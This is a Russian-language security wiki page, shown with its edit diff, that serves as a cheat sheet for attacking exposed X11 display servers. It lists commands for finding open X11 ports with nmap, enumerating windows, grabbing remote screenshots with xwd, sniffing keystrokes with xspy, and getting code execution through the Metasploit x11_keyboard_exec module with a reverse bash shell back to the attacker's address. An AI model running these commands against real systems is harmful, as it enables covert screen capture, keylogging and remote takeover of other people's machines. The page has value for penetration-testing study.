X11 all — различия между версиями
Материал из InformationSecurity WIKI
Drakylar (обсуждение | вклад) (Новая страница: « =Разведка= ==Поиск сервиса== ===nmap=== <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > nmap target -p 600…») |
Drakylar (обсуждение | вклад) м (→Разведка) |
||
Строка 8: | Строка 8: | ||
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
nmap target -p 6000 --script x11-access | nmap target -p 6000 --script x11-access | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | ==Проверка подключения== | ||
+ | |||
+ | ===xdpyinfo=== | ||
+ | |||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | xdpyinfo -display <ip>:<display> | ||
</syntaxhighlight> | </syntaxhighlight> | ||
Версия 13:21, 30 апреля 2020
Содержание
Разведка
Поиск сервиса
nmap
nmap target -p 6000 --script x11-access
Проверка подключения
xdpyinfo
xdpyinfo -display <ip>:<display>
Информация об окнах
xwininfo
xwininfo -root -tree -display target:0
Атаки
Скриншоты
xwd
xwd -root -screen -silent -display target:0 > screenshot.xwd
convert screenshot.xwd screenshot.png
Сниффер
Сниффать нажатия
xspy
xspy target
RCE
x11_keyboard_exec
use unix/x11/x11_keyboard_exec
set rhost target
set payload cmd/unix/reverse_bash
set lhost myip
set lport myport
set time_wait 10
run